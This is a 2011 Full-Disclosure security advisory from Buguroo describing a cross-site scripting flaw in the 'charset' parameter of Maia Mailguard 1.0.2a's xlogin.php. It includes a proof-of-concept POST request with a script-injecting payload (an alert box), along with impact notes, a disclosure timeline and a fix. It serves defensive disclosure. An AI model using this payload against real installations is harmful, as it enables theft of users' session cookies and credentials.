Maia Mailguard is affected by a XSS vulnerability in version 1.0.2a

[Mario López Jiménez <mlopez () buguroo com>]

===================================
BUGUROO SECURITY SYSTEMS ALERT
- Advisory: http://buguroo.com/adv/Buguroo_ADV_2011-001.txt
- Discovered on: March 29th, 2011
- Discovered by: Mario Lopez (mlopez (at) buguroo (dot) com)
- Severity: 5/10
===================================

1. VULNERABILITY
----------------------------
Maia Mailguard is affected by a XSS vulnerability in version 1.0.2a.

2. BACKGROUND
----------------------------
Maia Mailguard is a web-based interface and management system based on the
popular amavisd-new e-mail scanner and SpamAssassin. Written in Perl and
PHP, Maia Mailguard gives end-users control over how their mail is processed
by virus scanners and spam filters, while giving mail administrators the
power to configure site-wide defaults and limits.

3. DESCRIPTION
----------------------------
Any user has the ability to inject and execute arbitrary HTML and Javascript
code into the application.

The vulnerability exists due to failure in the "xlogin.php" script to
properly sanitize user-supplied input in "charset" variable. Successful
exploitation of this vulnerability could result in a compromise of the
application, theft of cookie-based authentication credentials, disclosure or
modification of sensitive data.

4. PROOF OF CONCEPT
----------------------------
An attacker can use browser to exploit this vulnerability. Example PoC url
is as follows:

POST https://example.com/xlogin.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg,
application/x-shockwave-flash, application/xaml+xml,
application/vnd.ms-xpsdocument, application/x-ms-xbap,
application/x-ms-application, */*
Referer: https://example.com/login.php
Accept-Language: es
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;
.NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Content-Type: application/x-www-form-urlencoded
Host: example.com
Content-Length: 63
Connection: Keep-Alive
Cache-Control: no-cache

super=&charset="></style><script>alert(11700)</script>&username=user&pwd=pass&submit=+Login+

5. BUSINESS IMPACT
----------------------------
A theft authentication admin credentials can damage the corporation image.

6. SYSTEMS AFFECTED
----------------------------
Maia Mailguard v1.0.2a and prior (all).

7. SOLUTION
----------------------------
Sanitize the inputs.

8. REFERENCES
----------------------------
http://www.maiamailguard.com
http://blog.buguroo.com

9. CREDITS
----------------------------
This vulnerability has been discovered and reported by Mario Lopez Jimenez,
Senior Security Analyst with Buguroo Offensive Security (mlopez (at) buguroo
(dot) com).

10. DISCLOSURE TIMELINE
----------------------------
2011-03-29: Vulnerability was identified
2011-03-31: Vendor contacted
2011-04-01: Response and correction started.
2011-04-03: Update Available.
2011-04-07: Buguroo publishes this security advisory.

11. ABOUT BUGUROO
----------------------------
Buguroo is a Spanish offensive security company founded in 2007, exclusively
dedicated to the development of IT security solutions by means of its own
software factory, We are a 100% R+D company under continuous evolution and
technological renovation, enabling us to stay at the vanguard of our sector
and to offer a first class service world wile.

12. DISCLAIMER
----------------------------
Buguroo Offensive Security, S.L. assumes no liability for the use of the
information provided in this advisory. This advisory was released in an
effort to help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

-- 
Mario López Jiménez
Buguroo Offensive Security
www.buguroo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/